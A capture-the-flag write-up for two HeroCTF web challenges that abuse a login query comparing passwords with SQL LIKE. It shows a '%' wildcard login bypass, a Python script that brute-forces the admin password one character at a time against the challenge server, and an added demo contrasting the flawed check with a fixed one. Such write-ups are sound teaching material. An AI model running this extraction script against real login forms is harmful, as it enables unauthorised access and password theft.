HeroCTF v3 Writeup: PwnQL 1 & 2 (SQL Injection)
PwnQL 1 and 2 are web challenges worth 50 and 75 points respectively.

Website:

Let’s start by reading the source code:

Hmmm… login.php.bak? Let’s try to get the file:


We have to log in as admin to get the flag. To log in as admin we need the query to return a row, and the password check in the query is:
password LIKE :password;
They used LIKE to compare the input against the stored password, but this is easy to bypass with SQL wildcard characters:

“%” matches any sequence of characters, so the LIKE comparison is always true:
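To show the root cause and the fix side by side, here is an added example (not code from the challenge or its author) using an in-memory SQLite database with a constructed admin row: a parameterised query still lets LIKE interpret "%" and "_" from user input, while an exact lookup plus a constant-time hash comparison does not.

```python
import hashlib
import hmac
import sqlite3

# Constructed demo credential; not the challenge's real password.
DEMO_PASSWORD = "s3cretPass"


def make_db() -> sqlite3.Connection:
    """Build a throwaway users table with one admin row (sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, pw_hash TEXT)")
    # Unsalted SHA-256 is used only to keep the demo short; a real application
    # would store a slow, salted hash (e.g. PHP's password_hash / bcrypt).
    pw_hash = hashlib.sha256(DEMO_PASSWORD.encode()).hexdigest()
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", ("admin", DEMO_PASSWORD, pw_hash))
    return conn


def login_like(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable check in the style of login.php: the value is bound as a
    parameter, so there is no classic string injection, but LIKE still treats
    '%' and '_' in the bound value as wildcards. '%' alone matches anything,
    and 's3%' matches only passwords starting with 's3', which is exactly the
    oracle a character-by-character brute force relies on."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password LIKE ?",
        (username, password),
    ).fetchone()
    return row is not None


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened check: exact lookup by username, then compare a hash of the
    supplied password in constant time. No pattern matching is involved, so
    wildcard characters are just ordinary characters."""
    row = conn.execute("SELECT pw_hash FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        return False
    candidate = hashlib.sha256(password.encode()).hexdigest()
    return hmac.compare_digest(candidate, row[0])


if __name__ == "__main__":
    db = make_db()
    for attempt in ["%", "s3%", "x%", "s3cretPass"]:
        print(f"{attempt!r:14} LIKE -> {login_like(db, 'admin', attempt)!s:5} "
              f"fixed -> {login_fixed(db, 'admin', attempt)}")
```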


PwnQL #2:

The website is the same as in PwnQL 1, but here we have to find the password. Most of the work is already done: all that is left is to brute-force the flag one character at a time, appending “%” to each guess. I wrote a Python script to automate this:
import requests

url = "http://chall1.heroctf.fr:8080/index.php"
headers = {'Content-type': 'application/x-www-form-urlencoded', 'Accept': '*/*'}
# Characters to try at each position. Note that "_" is itself a LIKE wildcard
# (it matches any single character); it is last in the list, so it can only
# match when none of the literal candidates before it did.
possible_chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$_'


def get_password(username):
    print("Extracting password of " + username)
    password = ""
    while True:
        for c in possible_chars:
            # Known prefix + candidate character + "%": the LIKE check only
            # succeeds if the stored password starts with that prefix.
            payload = "username=" + username + "&password=" + password + c + "%"
            pr = requests.post(url, data=payload, headers=headers)
            print(payload)
            if "flag" in pr.text:
                password += c
                print(password)
                break
            if c == possible_chars[-1]:
                # No candidate extended the prefix: the full password is known.
                found = password.replace("\\", "")
                print("Found password " + found + " for username " + username)
                return found


get_password("admin")
Output:

